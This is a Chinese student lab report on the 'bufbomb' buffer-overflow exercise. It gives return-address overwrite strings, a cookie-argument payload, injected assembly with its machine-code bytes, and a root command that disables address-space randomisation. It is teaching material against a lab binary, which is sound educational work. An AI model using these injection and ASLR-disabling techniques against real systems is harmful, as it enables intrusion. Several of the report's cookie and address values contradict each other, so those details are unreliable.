實驗4緩沖區(qū)溢出攻擊實驗VIP

百度文庫-讓每個人平等地提升自我百度文庫-讓每個人平等地提升自我PAGEPAGE10百度文庫-讓每個人平等地提升自我PAGE深圳大學(xué)實驗報告課程名稱：計算機系統(tǒng)(2)實驗項目名稱：緩沖區(qū)溢出攻擊實驗學(xué)院：計算機與軟件學(xué)院專業(yè)：指導(dǎo)教師：羅秋明報告人：學(xué)號：班級：實驗時間：2017年5月12日實驗報告提交時間：2017年5月31日教務(wù)處制一、實驗?zāi)繕耍豪斫獬绦蚝瘮?shù)調(diào)用中參數(shù)傳遞機制；掌握緩沖區(qū)溢出攻擊方法；進一步熟練掌握GDB調(diào)試工具和objdump反匯編工具。二、實驗環(huán)境：計算機（IntelCPU）Linux32位操作系統(tǒng)（Ubuntu16.04）GDB調(diào)試工具objdump反匯編工具三、實驗內(nèi)容本實驗設(shè)計為一個黑客利用緩沖區(qū)溢出技術(shù)進行攻擊的游戲。我們僅給黑客（同學(xué)）提供一個二進制可執(zhí)行文件bufbomb和部分函數(shù)的C代碼，不提供每個關(guān)卡的源代碼。程序運行中有3個關(guān)卡，每個關(guān)卡需要用戶輸入正確的緩沖區(qū)內(nèi)容，否則無法通過管卡！要求同學(xué)查看各關(guān)卡的要求，運用GDB調(diào)試工具和objdump反匯編工具，通過分析匯編代碼和相應(yīng)的棧幀結(jié)構(gòu)，通過緩沖區(qū)溢出辦法在執(zhí)行了getbuf()函數(shù)返回時作攻擊，使之返回到各關(guān)卡要求的指定函數(shù)中。第一關(guān)只需要返回到指定函數(shù)，第二關(guān)不僅返回到指定函數(shù)還需要為該指定函數(shù)準備好參數(shù)，最后一關(guān)要求在返回到指定函數(shù)之前執(zhí)行一段匯編代碼完成全局變量的修改。實驗代碼bufbomb和相關(guān)工具（sendstring/makecookie）的更詳細內(nèi)容請參考“實驗四緩沖區(qū)溢出攻擊實驗.pptx”。本實驗要求解決關(guān)卡1、2、3，給出實驗思路，通過截圖把實驗過程和結(jié)果寫在實驗報告上。四、實驗步驟和結(jié)果首先是makecookie:步驟1返回到smoke()解題思路步驟1是要修改getbuf()的返回地址，在執(zhí)行完getbuf()后不是返回到原來的調(diào)用者test()，而是跳到一個叫做smoke()的函數(shù)里。只需構(gòu)造一段字符串讓Gets()全部拷貝到buf數(shù)組了，從而造成緩沖區(qū)溢出。同時最重要的一點是：將smoke()函數(shù)的初始地址也放到構(gòu)造的字符串內(nèi)，使其恰好覆蓋到getbuf()的returnaddress位置。解題過程首先要知道smoke()的初始地址，用objdump查看符號表smoke的初始地址是0x08048eb0。buf第一個元素的地址是-0x18，而returnaddress第一個字節(jié)的地址是0x04，兩個位置的相差換算成十進制就是0x04-(-0x18)=4+24=28。也就是說我們要構(gòu)造28個字符，然后加上smoke()的地址就能準確覆蓋到returnaddress了。1.3最終結(jié)果截圖步驟2返回到fizz()并準備相應(yīng)參數(shù)2.1解題思路通過objdump-t查看符號表中fizz()函數(shù)的初始地址。拿到了地址0x08048e60，只要用它替換掉之前exploit.raw中smoke()的地址就能讓getbuf()執(zhí)行完畢后返回到fizz()中。然后用makecookie生成我的用戶名ylb。以getbuf()調(diào)用Gets()為例，看一下調(diào)用者的代碼和對應(yīng)的棧。2.2解題過程先分析出從getbuf()函數(shù)結(jié)束后，到調(diào)用fizz()函數(shù)前棧的情況：0x0c即將是fizz()棧區(qū)0x08即將是fizz()棧區(qū)0x04getbuf()的返回地址（即fizz()的地址）<-%esp0x00getbuf()中%ebp的保存值得知，在返回并調(diào)用fizz()前，棧指針指向0x04處（相對getbuf()中的%ebp為0x00），隨后fizz()調(diào)用時，會把fizz()的%ebp值壓入棧中，8048e66: 8b4508mov0x8(%ebp),%eax8048e69: 3b05d4a10408 cmp0x804a1d4,%eax再結(jié)合這兩行代碼得知，fizz()函數(shù)的傳入?yún)?shù)是應(yīng)該存放在0x8(%ebp)處的，棧的情況應(yīng)變?yōu)椋?x0cfizz的傳入?yún)?shù)0x08fizz()的返回地址0x04fizz()中%ebp的保存值<-%esp（因為壓棧，getbuf()的返回地址被替換）0x00getbuf()中%ebp的保存值01020304050607080910111213141516171819202122232425262728608e0408這串字符串剛覆蓋到0x08，即還需要覆蓋4個字節(jié)，然后傳入黑客cookie值../makecookieylb利用該命令獲得個人黑客cookie值為0x239772d5黑客cookie值依據(jù)小端法調(diào)整為963cdf30，cookie值前方還需覆蓋4個字節(jié)，故得到完整字符串內(nèi)容為：01020304050607080910111213141516171819202122232425262728608e040801020304d57297230dcatexploit2.txt|./sendstring|./bufbomb–tylb最后通過以上指令來把字符串內(nèi)容構(gòu)造并輸入到bufbomb程序中。2.3最終結(jié)果截圖步驟3返回到bang()且修改global_value解題思路因為全局變量與代碼不在一個段中，所以我們不能讓緩沖區(qū)一直溢出到.bss段（因為global_value初始化為0，所以它會被放在.bss而非.data段以節(jié)省空間）覆蓋global_value的值。若修改了.bss和.text之間某些只讀的段會引起操作系統(tǒng)的“警覺”而報錯。所以在進入bang()之前我們需要執(zhí)行一小段我們自己的代碼去修改global_value，這一段代碼就叫做exploitcode。解題過程a.bang()和global_value地址得到bang()的入口地址0x08048e10，以及global_value的地址0x0804a1c4利用gdb調(diào)試獲得buf字符數(shù)組的首地址，即是注入代碼的首地址。gdbbufbomb;調(diào)試程序disassgetbuf;查看getbuf的匯編代碼給getbuf()設(shè)置斷點，程序把斷點設(shè)置在0x8048ad6run–tylb;運行程序p$ebp-0x18;由lea-0x18(%ebp),%eax分析出buf地址為%ebp地址-0x18得出buf地址，也即注入代碼地址應(yīng)為0xbfffb930接下來編寫注入代碼（匯編代碼）：.code32;讓gcc以32位模式來編譯movl$0x333382e2,0x0804a1c4;令global_value=cookie值pushl$0x08048e10;%esp->bang入口地址ret;retbang()gcc–cexploit_code.s//編譯匯編文件為可重定位文件.s->.oobjdump–dexploit_code.o//查看可重定位文件的內(nèi)容最終獲得注入代碼的16進制機器碼，為16字節(jié)。在第1題中返回地址前有28個字節(jié)的空間，故在注入代碼后面仍需補充12個字節(jié)的空間，為方便計數(shù)定為01~12，緊接著則是buf的地址，讓getbuf()返回時跳轉(zhuǎn)到注入代碼的首地址，按照小端法，buf地址應(yīng)為30b9ffff，故完整字符串為：c705c4a10408e282333368108e0408c301020304050607080910111230b9ffbf0d忽略空格（和下劃線）后，得到exploit3.txt的內(nèi)容為：c705c4a10408e282333368108e0408c301020304050607080910111230b9ffbf0dLinux內(nèi)存地址有隨機化機制，若隨機化機制打開，那么每次運行程序，%ebp的地址可能是不一樣的，即buf地址無法確定（注入代碼開始地址無法確定），這樣的話，注入代碼將無法正確編寫。所以需要先關(guān)閉Linux內(nèi)存地址隨機化機制，才能完成實驗。可以通過設(shè)置kernel.randomize_va_space內(nèi)核參數(shù)來設(shè)置內(nèi)存地址隨機化的行為。#echo0>/proc/sys/kernel/randomize_va_space3.3最終結(jié)果截圖將global_value的值設(shè)為0x333382e2五、實驗總結(jié)與體會（1）在做第一題的時候，遇到了一個問題。Error:Unabletosendvalidationinformationtogradingserver.隨后在網(wǎng)上查閱了相關(guān)的資料，明白了需要先安裝sendmail。執(zhí)行的命令如下：sudoapt-getinstallsendmailsudoapt-getinstallsendmail-cf隨后問題得以解決。（2）而第三題，遇到了一個問題。Linux有內(nèi)存地址隨機化機制